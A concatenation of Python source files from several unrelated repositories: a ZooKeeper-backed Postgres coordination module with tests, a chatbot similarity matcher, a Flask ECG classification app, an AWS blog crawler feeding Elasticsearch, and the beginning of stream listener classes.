async def test_retry_deadline(deadman_plugin):
with mock.patch('time.time') as time:
plugin = deadman_plugin('A')
time.return_value = 120
print(ttt.time(), time())
def my_side_effect():
time.return_value = 240
raise kazoo.exceptions.ConnectionLoss()
verify = mock_verify(plugin, my_side_effect)
# set state from both plugins
with pytest.raises(kazoo.retry.RetryFailedError) as e:
plugin.dcs_set_state(dict(name='A'))
assert e.value.args[0] == "Exceeded retry deadline"
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
@pytest.mark.asyncio
async def test_retry_list_all_states(deadman_plugin):
# connection loss is a temporary exception which seems to happen after a re-connection
# (but not session expiration) in zookeeper. We just retry that till it works.
plugin = deadman_plugin('A')
plugin.dcs_set_state(dict(name='A'))
verify = mock_verify(plugin, [
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
kazoo.exceptions.ConnectionLoss(),
None,
None,
None,
None])
# set state from both plugins
assert list(plugin.dcs_list_state()) == [('A', {'name': 'A'})]
await asyncio.sleep(0.001)
assert plugin.app.mock_calls == []
```

#### File: zgres/zgres/zookeeper.py
```python
import json
import asyncio
from asyncio import sleep
import queue
import logging
from functools import partial
from collections.abc import Mapping
import kazoo.exceptions
from kazoo.client import KazooClient, KazooState, KazooRetry
from .plugin import subscribe
_missing = object()
def state_to_databases(state, get_state):
"""Convert the state to a dict of connectable database clusters.
The dict is:
{"databases": {
"databaseA": {
"master": "10.0.0.19",
"nodes": {
"10.0.0.9":
{
...extra node data...
},
"10.0.0.10":
{
...extra node data...
},
"10.0.0.99":
{
...extra node data...
}}},
"databaseB": {
"master": "10.0.0.19",
"nodes": {
"10.0.0.19":
{
...extra node data...
},
"10.0.0.20":
{
...extra node data...
}}},
}}
if get_state=True, then node data will be the contents of the state-
znodes. If get_state=False, the node data will be the contents of the
conn- znodes.
"""
databases = {}
for node, v in state.items():
parts = node.split('_', 1)
if len(parts) == 1:
continue
cluster_name, node = parts
if node.startswith('state_') and get_state:
_, ip4 = node.split('_', 1)
database = databases.setdefault(cluster_name, dict(nodes={}))
assert ip4 not in database['nodes']
database['nodes'][ip4] = v
if node.startswith('conn_') and not get_state:
_, ip4 = node.split('_', 1)
database = databases.setdefault(cluster_name, dict(nodes={}))
assert ip4 not in database['nodes']
database['nodes'][ip4] = v
if node == 'master':
cluster = databases.setdefault(cluster_name, dict(nodes={}))
cluster['master'] = v
return databases
class DictWatch(Mapping):
"""A mapping which reflects the content of a path in ZooKeeper.
For every znode in the path, there will exist a key (znode name) and value
(deserialized node content) in the mapping. To be notified if the mapping
changes, you can pass a callback function, this will be called on change.
The callback is called with 4 arguments: (mapping, key, from_value, to_value)
* mapping is the DictWatch object
* key is the dictionary key
* to_value is the value which is being set
* from_value is the value which was there previously
The callback WILL be called in the main thread and the order of events from
zookeeper will be maintained.
On add, from_value is DictWatch.MISSING; on delete, to_value will be
DictWatch.MISSING.
The implementation of this is that kazoo-fired events will be put on a
threadsafe queue and will be processed later (in order) in the asyncio main
thread.
"""
MISSING = object()
def __init__(self, zk, path, callback, prefix=None, deserializer=None):
self._zk = zk
self._callback = callback
self._state = {}
if not path.endswith('/'):
path += '/'
self._path = path
self._child_watchers = {}
self._loop = asyncio.get_event_loop()
self._zk_event_queue = queue.Queue()
self._prefix = prefix
self._watch()
if deserializer is not None:
self._deserialize = deserializer
def _watch(self):
"""Start watching."""
watch = partial(self._queue_event, '_children_changed')
self._child_watcher = self._zk.ChildrenWatch(self._path, watch)
def __getitem__(self, key):
return self._state[key]
def __iter__(self):
return iter(self._state)
def __len__(self):
return len(self._state)
def _deserialize(self, data):
data = data.decode('ascii')
return json.loads(data)
def _queue_event(self, event_name, *args, **kw):
# Note: this runs in the kazoo thread, hence we use
# a threadsafe queue
self._zk_event_queue.put((event_name, args, kw))
self._loop.call_soon_threadsafe(self._consume_queue)
def _consume_queue(self):
while True:
try:
event_name, args, kw = self._zk_event_queue.get(block=False)
except queue.Empty:
return
getattr(self, event_name)(*args, **kw)
def _watch_node(self, node):
child_path = self._path + node
watch = partial(self._queue_event, '_node_changed', node)
return self._zk.DataWatch(child_path, watch)
def _node_changed(self, node, data, stat, event):
"""Watch a single node in zookeeper for data changes."""
old_val = self._state.pop(node, self.MISSING)
if data is None:
new_val = self.MISSING
self._child_watchers.pop(node, None) # allow our watcher to get garbage collected
else:
new_val = self._deserialize(data)
self._state[node] = new_val
if old_val is self.MISSING and new_val is self.MISSING:
# we re-deleted an already deleted node
return
if old_val == new_val:
# no change
return
self._callback(self, node, old_val, new_val)
def _children_changed(self, children):
to_add = set(children) - set(self._child_watchers)
for node in to_add:
if self._prefix is not None:
if not node.startswith(self._prefix):
continue
self._child_watchers[node] = self._watch_node(node)
class ZooKeeperSource:
_old_connection_info = None
def __init__(self, name, app):
self.app = app
self._path_prefix = self.app.config['zookeeper']['path'].strip()
if not self._path_prefix.endswith('/'):
self._path_prefix += '/'
@subscribe
def start_watching(self, state, conn_info, masters, databases):
self._storage = ZookeeperStorage(
self.app.config['zookeeper']['connection_string'],
self.app.config['zookeeper']['path'].strip(),
timeout=float(self.app.config['zookeeper'].get('timeout', '10').strip()),
)
self._storage.dcs_connect()
if state is not None:
self._storage.dcs_watch_state(state)
if conn_info is not None:
print('CONNECT_CONN_INFO', conn_info)
self._storage.dcs_watch_conn_info(conn_info)
else:
print('SKIP CONNECT_CONN_INFO', conn_info)
if masters is not None:
self._storage.dcs_watch_locks('master', masters)
if databases is not None:
self._storage.dcs_watch_database_identifiers(partial(self._notify_databases, databases))
def _notify_databases(self, callback, state):
callback(list(state.keys()))
def _get_clusters(in_dict):
out_dict = {}
for k, v in in_dict.items():
group_name, cluster_id = k.split('-', 1)
out_dict.setdefault(group_name, {})[cluster_id] = v
return out_dict
class ZooKeeperDeadmanPlugin:
_dcs_state = None
def __init__(self, name, app):
self.name = name
self.app = app
self.tick_time = app.tick_time # seconds: this should match the zookeeper server tick time (normally specified in milliseconds)
self.logger = logging
self._takeovers = {}
self._kazoo_retry = KazooRetry(
max_tries=10,
deadline=60,
ignore_expire=False,
)
def _retry(self, method, *args, **kw):
cmd = getattr(self._storage, method)
try:
return self._kazoo_retry(cmd, *args, **kw)
except kazoo.exceptions.SessionExpiredError:
# the session has expired, we are going to restart anyway when the LOST state is set
# however the exception handler waits some time before restarting
#
# we want to restart immediately so call restart(0) first
loop = asyncio.get_event_loop()
loop.call_soon(self.app.restart, 0)
raise
@subscribe
def initialize(self):
self._loop = asyncio.get_event_loop()
self._storage = ZookeeperStorage(
self.app.config['zookeeper']['connection_string'],
self.app.config['zookeeper']['path'].strip(),
timeout=float(self.app.config['zookeeper'].get('timeout', '10').strip()),
)
# we start watching first to get all the state changes
self._storage.connection.add_listener(self._session_state_handler)
self._storage.dcs_connect()
self._group_name = self.app.config['zookeeper']['group'].strip()
if '/' in self._group_name or '-' in self._group_name:
raise ValueError('cannot have - or / in the group name')
def _session_state_handler(self, state):
self._dcs_state = state
self.logger.warn('zookeeper connection state: {}'.format(state))
if state != KazooState.CONNECTED:
self._loop.call_soon_threadsafe(self._loop.create_task, self._check_state())
if state == KazooState.LOST:
self._loop.call_soon_threadsafe(self.app.restart, 0)
async def _check_state(self):
for i in range(20):
await sleep(1)
if self._dcs_state == KazooState.CONNECTED:
return
# we could not re-connect within 20 seconds,
# so we assume all is lost and we should restart
self._loop.call_soon(self.app.restart, 0)
@subscribe
def dcs_set_database_identifier(self, database_id):
return self._retry('dcs_set_database_identifier', self._group_name, database_id)
@subscribe
def dcs_get_database_identifier(self):
return self._retry('dcs_get_database_identifier', self._group_name)
@subscribe
def dcs_set_timeline(self, timeline):
return self._retry('dcs_set_timeline', self._group_name, timeline)
@subscribe
def dcs_get_timeline(self):
return self._retry('dcs_get_timeline', self._group_name)
def _only_my_cluster_filter(self, callback):
def f(value):
callback(value.get(self._group_name, {}))
return f
@subscribe
def dcs_watch(self, master_lock, state, conn_info):
if master_lock is not None:
self._storage.dcs_watch_lock('master', self._group_name, master_lock)
if state is not None:
self._storage.dcs_watch_state(
self._only_my_cluster_filter(state),
self._group_name)
if conn_info is not None:
self._storage.dcs_watch_conn_info(
self._only_my_cluster_filter(conn_info),
self._group_name)
@subscribe
def dcs_get_lock_owner(self, name):
return self._retry('dcs_get_lock_owner', self._group_name, name)
@subscribe
def dcs_lock(self, name):
result = self._retry('dcs_lock',
self._group_name,
name,
self.app.my_id)
if result in ('locked', 'owned'):
return True
elif result == 'broken':
self._log_takeover('lock/{}/{}'.format(self._group_name, self.app.my_id))
return True
elif result == 'failed':
return False
raise AssertionError(result)
@subscribe
def dcs_unlock(self, name):
self._retry('dcs_unlock', self._group_name, name, self.app.my_id)
def _log_takeover(self, path):
if self._takeovers.get(path, False):
# hmm, I have taken over before, this is NOT good
# maybe 2 of me are running
self.logger.error('Taking over again: {}\n'
'This should not happen, check that you do not '
'have 2 nodes with the same id running'.format(path))
else:
# first time I am taking over, probably normal operation after a restart
self.logger.info('Taking over {}'.format(path))
self._takeovers[path] = True
@subscribe
def dcs_set_conn_info(self, conn_info):
how = self._retry('dcs_set_conn_info', self._group_name, self.app.my_id, conn_info)
if how == 'takeover':
self._log_takeover('conn/{}/{}'.format(self._group_name, self.app.my_id))
@subscribe
def dcs_set_state(self, state):
how = self._retry('dcs_set_state', self._group_name, self.app.my_id, state)
if how == 'takeover':
self._log_takeover('state/{}/{}'.format(self._group_name, self.app.my_id))
@subscribe
def dcs_list_conn_info(self):
return self._retry('dcs_list_conn_info', group=self._group_name)
@subscribe
def dcs_list_state(self):
return self._retry('dcs_list_state', group=self._group_name)
@subscribe
def dcs_delete_conn_info(self):
self._retry('dcs_delete_conn_info',
self._group_name,
self.app.my_id)
@subscribe
def dcs_disconnect(self):
self._storage.connection.remove_listener(self._session_state_handler)
self._storage.dcs_disconnect()
class ZookeeperStorage:
"""A low level storage object.
Manages and publishes the zookeeper connection.
Manages the database "schema" and allows access to multiple "groups"
database servers, each representing one logical cluster.
"""
_zk = None
def __init__(self, connection_string, path, timeout=10.0):
self._connection_string = connection_string
self._path_prefix = path
self._timeout = timeout
if not self._path_prefix.endswith('/'):
self._path_prefix += '/'
self._watchers = {}
self._loop = asyncio.get_event_loop()
@property
def connection(self):
if self._zk is None:
self._zk = KazooClient(
hosts=self._connection_string,
timeout=self._timeout)
return self._zk
def dcs_connect(self):
self.connection.start()
def dcs_disconnect(self):
self._zk.stop()
self._zk = None
def _dict_watcher(self, group, what, callback):
def hook(state, key, from_val, to_val):
callback(_get_clusters(state))
path = self._folder_path(what)
prefix = group and group + '-' or group
try:
watch = DictWatch(self._zk, path, hook, prefix=prefix)
except kazoo.exceptions.NoNodeError:
self._zk.create(path, makepath=True)
return self._dict_watcher(group, what, callback)
self._watchers[id(watch)] = watch
return watch
def _listen_connection(self, state):
self._connection_state_changes.append(state)
self._loop.call_soon_threadsafe(self._consume_connection_state_changes)
def dcs_watch_conn_info(self, callback, group=None):
self._dict_watcher(group, 'conn', callback)
def dcs_watch_state(self, callback, group=None):
self._dict_watcher(group, 'state', callback)
def _folder_path(self, folder):
return self._path_prefix + folder
def _path(self, group, folder, key):
return self._path_prefix + folder + '/' + group + '-' + key
def _get_static(self, group, key):
path = self._path(group, 'static', key)
try:
data, stat = self._zk.get(path)
except kazoo.exceptions.NoNodeError:
return None
return data
def _set_static(self, group, key, data, overwrite=False):
path = self._path(group, 'static', key)
try:
self._zk.create(path, data, makepath=True)
except kazoo.exceptions.NodeExistsError:
if overwrite:
self._zk.set(path, data)
return True
return False
return True
def dcs_get_timeline(self, group):
data = self._get_static(group, 'timeline')
if data is None:
data = b'0'
return int(data.decode('ascii'))
def dcs_set_timeline(self, group, timeline):
assert isinstance(timeline, int)
existing = self.dcs_get_timeline(group)
if existing > timeline:
raise ValueError('Timelines can only increase.')
timeline = str(timeline).encode('ascii')
self._set_static(group, 'timeline', timeline, overwrite=True)
def dcs_set_database_identifier(self, group, database_id):
database_id = database_id.encode('ascii')
return self._set_static(group, 'database_identifier', database_id)
def dcs_get_database_identifier(self, group):
data = self._get_static(group, 'database_identifier')
if data is not None:
data = data.decode('ascii')
return data
def dcs_get_lock_owner(self, group, name):
path = self._path(group, 'lock', name)
try:
existing_data, stat = self._zk.get(path)
except kazoo.exceptions.NoNodeError:
return None
return existing_data.decode('utf-8')
def dcs_unlock(self, group, name, owner):
existing_owner = self.dcs_get_lock_owner(group, name)
if existing_owner == owner:
path = self._path(group, 'lock', name)
self._zk.delete(path)
def dcs_lock(self, group, name, owner):
data = owner.encode('utf-8')
path = self._path(group, 'lock', name)
try:
self._zk.create(path, data, ephemeral=True, makepath=True)
return 'locked'
except kazoo.exceptions.NodeExistsError:
pass
# lock exists, do we have it, can we break it?
try:
existing_data, stat = self._zk.get(path)
except kazoo.exceptions.NoNodeError:
# lock broke while we were looking at it
# try get it again
return self.dcs_lock(group, name, owner)
if stat.owner_session_id == self._zk.client_id[0]:
# we already own the lock
return 'owned'
elif data == existing_data:
# it is our lock, perhaps I am restarting, or there are 2 of me running!
try:
self._zk.delete(path, version=stat.version)
except (kazoo.exceptions.NoNodeError, kazoo.exceptions.BadVersionError):
# lock broke while we were looking at it
pass
# try get the lock again
result = self.dcs_lock(group, name, owner)
if result == 'locked':
return 'broken'
return result
return 'failed'
def dcs_watch_lock(self, name, group, callback):
loop = asyncio.get_event_loop()
def handler(data, stat, event):
if data is not None:
data = data.decode('utf-8')
callback(data)
path = self._path(group, 'lock', name)
w = self._zk.DataWatch(path, partial(loop.call_soon_threadsafe, handler))
self._watchers[id(w)] = w
def dcs_get_database_identifiers(self):
wanted_info_name = 'database_identifier'
dirpath = self._folder_path('static')
try:
children = self._zk.get_children(dirpath)
except kazoo.exceptions.NoNodeError:
return {}
result = {}
for name in children:
owner, info_name = name.split('-', 1)
if wanted_info_name != info_name:
continue
try:
data, state = self._zk.get(dirpath + '/' + name)
except kazoo.exceptions.NoNodeError:
continue
state = json.loads(data.decode('ascii'))
result[owner] = state
return result
def dcs_watch_database_identifiers(self, callback):
name = 'database_identifier'
def handler(state, key, from_val, to_val):
# this is probably more complex than it needs to be!
c_state = _get_clusters(state)
new_state = {}
for k, v in c_state.items():
ours = v.get(name, None)
if ours is not None:
new_state[k] = ours
callback(new_state)
dirpath = self._folder_path('static')
watch = DictWatch(
self._zk,
dirpath,
handler,
deserializer=lambda data: data.decode('utf-8'))
self._watchers[id(watch)] = watch
def dcs_watch_locks(self, name, callback):
def handler(state, key, from_val, to_val):
# this is probably more complex than it needs to be!
c_state = _get_clusters(state)
new_state = {}
for k, v in c_state.items():
ours = v.get(name, None)
if ours is not None:
new_state[k] = ours
callback(new_state)
dirpath = self._folder_path('lock')
watch = DictWatch(
self._zk,
dirpath,
handler,
deserializer=lambda data: data.decode('utf-8'))
self._watchers[id(watch)] = watch
def _set_info(self, group, type, owner, data):
path = self._path(group, type, owner)
data = json.dumps(data)
data = data.encode('ascii')
try:
stat = self._zk.set(path, data)
how = 'existing'
except kazoo.exceptions.NoNodeError:
how = 'create'
stat = None
if stat is not None and stat.owner_session_id != self._zk.client_id[0]:
self._zk.delete(path)
how = 'takeover'
stat = None
if stat is None:
self._zk.create(path, data, ephemeral=True, makepath=True)
return how
def dcs_set_conn_info(self, group, owner, data):
return self._set_info(group, 'conn', owner, data)
def dcs_set_state(self, group, owner, data):
return self._set_info(group, 'state', owner, data)
def _get_all_info(self, group, type):
dirpath = self._folder_path(type)
try:
children = self._zk.get_children(dirpath)
except kazoo.exceptions.NoNodeError:
return iter([])
for name in children:
this_group, owner = name.split('-', 1)
if group is not None and this_group != group:
continue
data, state = self._zk.get(dirpath + '/' + name)
state = json.loads(data.decode('ascii'))
yield owner, state
def dcs_list_conn_info(self, group=None):
return list(self._get_all_info(group, 'conn'))
def dcs_list_state(self, group=None):
return list(self._get_all_info(group, 'state'))
def dcs_delete_conn_info(self, group, owner):
path = self._path(group, 'conn', owner)
try:
self._zk.delete(path)
except kazoo.exceptions.NoNodeError:
pass
``` |
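A hedged sketch of driving the ZookeeperStorage class above directly, outside the deadman plugin. The connection string, path, group and owner names are placeholders; it assumes a reachable ZooKeeper ensemble and that kazoo is installed.
```python
# Sketch only: 'localhost:2181', '/zgres-example', 'mygroup' and 'node-a' are placeholders.
from zgres.zookeeper import ZookeeperStorage

storage = ZookeeperStorage('localhost:2181', '/zgres-example')
storage.dcs_connect()

# Record the database identifier and publish connection info for one group/owner,
# mirroring what ZooKeeperDeadmanPlugin does through its _retry wrapper.
storage.dcs_set_database_identifier('mygroup', '1234')
storage.dcs_set_conn_info('mygroup', 'node-a', {'host': '10.0.0.9'})

# Try to take the master lock; dcs_lock returns 'locked', 'owned', 'broken' or 'failed'.
print(storage.dcs_lock('mygroup', 'master', 'node-a'))
print(storage.dcs_list_conn_info(group='mygroup'))

storage.dcs_disconnect()
```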
{
"source": "JinuAugustine98/SoliBot",
"score": 3
} |
#### File: JinuAugustine98/SoliBot/similarity.py
```python
import re, math
from collections import Counter
from corpus import CORPUS
from corpus import DAIRY_CORPUS
from corpus import COTTON_CORPUS
from corpus import CASTOR_CORPUS
from corpus import AQUACULTURE_CORPUS
from corpus import FRUITS_CORPUS
from corpus import SUGARCANE_CORPUS
from corpus import TEA_CORPUS
from corpus import LEATHER_CORPUS
from corpus import PALM_CORPUS
WORD = re.compile(r'\w+')
def get_cosine(vec1, vec2):
intersection = set(vec1.keys()) & set(vec2.keys())
numerator = sum([vec1[x] * vec2[x] for x in intersection])
sum1 = sum([vec1[x]**2 for x in vec1.keys()])
sum2 = sum([vec2[x]**2 for x in vec2.keys()])
denominator = math.sqrt(sum1) * math.sqrt(sum2)
if not denominator:
return 0.0
else:
return float(numerator) / denominator
def text_to_vector(text):
words = WORD.findall(text)
return Counter(words)
def compare_similarity(word_one, word_two):
vector1 = text_to_vector(word_one.lower())
vector2 = text_to_vector(word_two.lower())
return get_cosine(vector1, vector2)
def find_most_similar(cate, word):
max = {"answer": None, "score": 0, "question": None, "image": None, "video": None}
if cate == "General":
DATA = CORPUS
elif cate == "Dairy":
DATA = DAIRY_CORPUS
elif cate == "Cotton":
DATA = COTTON_CORPUS
elif cate == "Castor":
DATA = CASTOR_CORPUS
elif cate == "Aquaculture":
DATA = AQUACULTURE_CORPUS
elif cate == "Fruits":
DATA = FRUITS_CORPUS
elif cate == "Sugarcane":
DATA = SUGARCANE_CORPUS
elif cate == "Tea":
DATA = TEA_CORPUS
elif cate == "Leather":
DATA = LEATHER_CORPUS
elif cate == "Palm":
DATA = PALM_CORPUS
else:
DATA = CORPUS
try:
for each in DATA:
score = compare_similarity(word, each['Question'])
if score > max['score']:
max['score'] = score
max['answer'] = each['Answer']
max['question'] = each['Question']
max['image'] = each['image_path']
max['video'] = each['a_link']
return {"score": max['score'], "answer": max['answer'], "question": max['question'], "image": max['image'], "video": max['video']}
except:
return {"score": 0.00, "answer": 'None', "question": 'None', "image": 'None', "video": 'None'}
``` |
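A minimal usage sketch for the similarity helpers above. compare_similarity only needs the two input strings; find_most_similar additionally assumes the corpus module imported at the top of the file is available. The question strings are illustrative.
```python
# Sketch only: assumes similarity.py and the corpus module it imports are importable.
from similarity import compare_similarity, find_most_similar

# Plain cosine similarity between two questions, in the range 0.0 - 1.0.
score = compare_similarity("How do I store harvested cotton?",
                           "What is the best way to store cotton after harvest?")
print(round(score, 2))

# Look up the closest question in the Cotton corpus; unknown categories
# fall back to the general CORPUS, exactly as find_most_similar does above.
match = find_most_similar("Cotton", "How do I store harvested cotton?")
print(match["score"], match["question"])
```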
{
"source": "jinujayan/Capstone_ECGAnalyzer",
"score": 2
} |
#### File: Capstone_ECGAnalyzer/app/app.py
```python
import os
import urllib.request
import pandas as pd
import numpy as np
from flask import Flask, flash, request, redirect, render_template
from werkzeug.utils import secure_filename
import json
import plotly
import plotly.figure_factory as ff
import plotly.offline as py
import plotly.graph_objs as go
import configparser
#import cufflinks as cf
#cf.go_offline()
import keras
from keras.models import load_model
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv1D, MaxPooling1D, GlobalAveragePooling1D
from keras.optimizers import SGD
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
import argparse
from keras import backend as K
#STATIC_DIR = os.path.abspath('../ECG_Analysis/app/static')
app = Flask(__name__,static_url_path='/static')
app.secret_key = os.urandom(24)
ALLOWED_EXTENSIONS = set(['csv', 'xlsx','xls'])
#print(os.getcwd())
def get_default_config():
conf = configparser.ConfigParser()
conf.read('../conf/config.ini')
config = conf['DEFAULT']
return config
conf = get_default_config()
deploy_type = conf['deploy_type']
print(deploy_type)
hostname = conf['hostname']
port = conf['port']
@app.route('/')
def upload_form():
"""
Method implementing the home url, it calls the index.html to render a home page view
@param
@return: Rendered html view
"""
return render_template('index.html',hostname=hostname, port=port)
def allowed_file(filename):
"""
Check if the input file has an allowed extension.
@param filename - Name of the uploaded file
@return: Boolean after checking the file extension
"""
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/uploader', methods=['GET','POST'])
def uploader():
if request.method == 'POST':
# check if the post request has the file part
test_flag = ''
if 'file' in request.files:
test_flag = 'file'
else:
test_flag = 'demo'
demo_data = request.form['samplevalue']
if test_flag == 'demo' :
demo_data = demo_data.split(',')
demo_data = [ float(val) for val in demo_data]
out_df, graphJSON = predictionHandler(demo_data = demo_data)
#print("Show the shape of output DF")
#print(out_df.shape)
colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
table.to_html()
pp_table = table.to_html()
return render_template('response.html', table = pp_table, graphplot = graphJSON)
else:
file = request.files['file']
if file.filename == '':
flash('No file selected for uploading')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(filename)
flash('File successfully uploaded...call the handler now..')
extension = file.filename.split('.')[1]
plot_index = request.form['plot_sample']
out_df, graphJSON = predictionHandler(file.filename,extension,plot_index= plot_index)
colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']]
table = ff.create_table(out_df, colorscale=colorscale, height_constant = 20)
table.to_html()
pp_table = table.to_html()
return render_template('response.html', table = pp_table, graphplot = graphJSON)
else:
flash('Allowed file types are csv,xls,xlsx')
return redirect(request.url)
def predictionHandler(test_file=False,extension='', plot_index=1, demo_data=[]):
"""
Method to call the inference on the model and to create the graph objects
@param test_file - Input analysis file
@param plot_index - The index of the data file to be plotted
@param demo_data - The demo data string
@return - Valid dataframe, graph json object
"""
plot_index = int(plot_index)
if test_file:
if extension == "csv":
df = pd.read_csv(test_file)
elif (extension == "xls" or extension == "xlsx"):
df = pd.read_excel(test_file)
else:
raise ValueError('Input file with unexpected extension, please use csv, xlsx,xls files')
test_rec = df.values
test_rec = test_rec.reshape(test_rec.shape[0], test_rec.shape[1],1)
else:
test_rec = np.array(demo_data)
test_rec = test_rec.reshape(1, test_rec.shape[0],1)
df_data = np.array(demo_data)
df_data = df_data.reshape(1,df_data.shape[0])
df = pd.DataFrame(data=df_data)
model_ECG_loaded = load_model('../models/model_ECG_final.h5')
model_MI_loaded = load_model('../models/model_MI_final.h5')
print("models loaded...")
out_classes = model_ECG_loaded.predict(test_rec)
print("prediction completed..")
ECG_class = np.argmax(out_classes,axis=1)
out_classes = model_MI_loaded.predict(test_rec)
MI_class = np.argmax(out_classes,axis=1)
out_df = pd.DataFrame(columns =['ECG_Class', 'MI_Class'], data = np.array([ECG_class, MI_class]).transpose())
out_df['User_id'] = out_df.index+1
out_df = out_df[['User_id', 'ECG_Class','MI_Class']]
ecg_clas_mapper = {0:'N', 1:'S', 2:'V', 3:'F',4:'Q'}
MI_class_mapper = {0:'Normal', 1:'Abnormal'}
out_df.ECG_Class = out_df.ECG_Class.map(ecg_clas_mapper)
out_df.MI_Class = out_df.MI_Class.map(MI_class_mapper)
ecg_class = out_df.iloc[plot_index-1].ECG_Class
mi_class = out_df.iloc[plot_index-1].MI_Class
if mi_class == 'Normal':
mi_class = 'Normal'
else:
mi_class = 'Abnormality'
graphs = createECGGraph(df,plot_index,ecg_class,mi_class)
graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
return out_df,graphJSON
def createECGGraph(df, plot_index, ecg_class, mi_class):
"""
Method to create the line plot graph object
@param df - The intermediate dataframe with predicted classes
@param plot_index - The index of the data file to be plotted
@param ecg_class - The ECG class identified for the index being plotted
@param mi_class - The myocardial infarction class identified for the index being plotted
@return: Valid plotly graph object
"""
df_index = plot_index-1
xvals = list(range(0, df.iloc[df_index].count()))
yvals = list(df.iloc[df_index].values)
graphs = [
{
'data': [
{
"x": xvals,
"y":yvals,
"type": "scatter"
}
],
'layout': {
'title': f"ECG Readings for the record# {plot_index}, ECG class = {ecg_class} <br> MI tests shows {mi_class}",
'yaxis': {
'title': "ECG Readings"
},
'xaxis': {
'title': "Time instance"
}
}
}
]
return graphs
if __name__ == "__main__":
app.run(host='0.0.0.0', port=port,threaded=False)
``` |
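A hedged client-side sketch for exercising the /uploader route defined above. The host, port and file name are placeholders; the form field names ('file', 'plot_sample', 'samplevalue') match what uploader() reads from the request, and the number of demo readings must match the input length the ECG models were trained on.
```python
# Sketch only: host/port and ecg_records.csv are placeholder values.
import requests

base_url = "http://localhost:5000/uploader"

# File-based analysis: upload a CSV of ECG readings and ask for record 1 to be plotted.
with open("ecg_records.csv", "rb") as f:
    resp = requests.post(base_url,
                         files={"file": f},
                         data={"plot_sample": "1"})
print(resp.status_code)

# Demo mode: no file part, just a comma-separated string of readings in 'samplevalue'.
# The placeholder below must contain as many values as the models expect.
readings = ",".join(["0.1"] * 187)
resp = requests.post(base_url, data={"samplevalue": readings})
print(resp.status_code)
```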
{
"source": "jinuland/aws-blog-crawler",
"score": 3
} |
#### File: aws-blog-crawler/scripts/aws-crawler-ko.py
```python
import requests
from bs4 import BeautifulSoup
from elasticsearch import Elasticsearch
from datetime import datetime
import time
import yaml
import argparse
import json
seedURL = 'https://aws.amazon.com/ko/blogs/korea'
with open('./conf.yaml', 'r') as f:
config = yaml.load(f, Loader=yaml.SafeLoader)
es = Elasticsearch( [config['amazon_es_host']],
http_auth=(config['user_id'], config['password']),
scheme="https",
port=443
)
indexName = config['index']
file = config['archive_file_name_ko']
f = open(file, 'w')
def parse(url, doArchive):
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
articles = soup.find_all('article')
for article in articles:
title = article.find('h2').get_text()
print('title is : ' + title)
url = article.find('h2').find('a')['href']
print("url is : " + url)
author = article.find('footer').find('span', {"property" : "author"}).get_text()
print('author : ' + author)
postingTime = article.find('footer').find('time').get_text()
isoPostingTime = datetime.strptime(postingTime, '%d %b %Y').isoformat()
print('time : ' + isoPostingTime)
category = ''
categoryList = []
try :
category_spans = article.find('footer').find('span', {"class", "blog-post-categories"}).find_all('a')
print(len(category_spans))
categoryList = list(map(lambda x : "'" + x.find('span').get_text() + "'", category_spans))
print(categoryList)
category = ','.join(categoryList)
print('category : ' + category)
except(AttributeError) as e :
pass
body = article.find('section').get_text()
print('body : ' + body)
doc = {
'title': title,
'author': author,
'date': isoPostingTime,
'category': categoryList,
'body': body,
'url' : url
# TODO: write code...
}
index = {
"index" : {
"_index" : indexName,
"_id" : doc['title']
}
}
print(doc)
if doArchive :
f.write(json.dumps(index) + "\n")
f.write(json.dumps(doc) + "\n")
else :
res = es.index(index='aws-blog', body=doc, id=title)
print(res)
parser = argparse.ArgumentParser()
parser.add_argument("--archive", help="archive blog data to file", action="store_true")
args = parser.parse_args()
pageMax = 200
for pageNum in range(1,pageMax):
if pageNum < 2 :
parse(seedURL, args.archive)
else :
parse(seedURL + '/page/' + str(pageNum), args.archive)
time.sleep(0.1)
f.close()
``` |
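With --archive the script above writes newline-delimited pairs of bulk-index actions and documents. A hedged sketch of replaying such an archive through the Elasticsearch bulk API; the host, credentials and archive file name mirror the conf.yaml keys used above and are placeholders here.
```python
# Sketch only: host, credentials and the archive file name are placeholders.
from elasticsearch import Elasticsearch

es = Elasticsearch(["https://search-example.es.amazonaws.com"],
                   http_auth=("user", "password"),
                   scheme="https",
                   port=443)

# The archive already alternates {"index": ...} action lines and document lines,
# which is the newline-delimited body the bulk endpoint expects.
with open("aws-blog-archive-ko.json", "r", encoding="utf-8") as f:
    body = f.read()

res = es.bulk(body=body)
print(res.get("errors"))
```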
{
"source": "jinulee-v/koshort",
"score": 3
} |
#### File: koshort/birdman/error.py
```python
class ParserUpdateRequiredError(Exception):
def __init__(self, name, msg):
super(ParserUpdateRequiredError, self).__init__("%s | %s"%(name, msg))
class UnknownError(Exception):
def __init__(self, name):
super(UnknownError, self).__init__("%s | %s"%(name, "Unknown error. Generate issues in our Github repository for support."))
```
#### File: birdman/listen/base.py
```python
from abc import ABCMeta, abstractmethod
class BaseListener(object):
"""BaseListener class contains:
Methods:
listen : listens and reacts to the dictionary it is provided.
Since streamers provide dict with its own unique set of keys,
Listeners should be aware of such different formats.
"""
__metaclass__ = ABCMeta
def __init__(self, obj):
"""
Args:
listen_to: Iterable[str]. List of Streamer.config.name to listen.
For default, listen on everything.
"""
self.listen_to = obj.get('listen_to', None)
@abstractmethod
def listen(self, result):
'''Must override.
Listens to the result object(dict) and process it however you like.
'''
pass
@abstractmethod
async def close(self):
'''Must override.
How to properly close this listener?
'''
pass
```
#### File: birdman/listen/text.py
```python
from birdman.listen import register_listener
from birdman.listen.base import BaseListener
@register_listener('text')
class TextListener(BaseListener):
"""TextListener records the result dict in given format to the desired file.
formatstr decides your desired text format.
It is directly fed to built-in format() function, so check "python format() named placeholder syntax" for good.
"""
def __init__(self, obj):
"""
Args:
file, encoding, bufsize: Equal to python built-in `open()`
keys: Iterable(str).
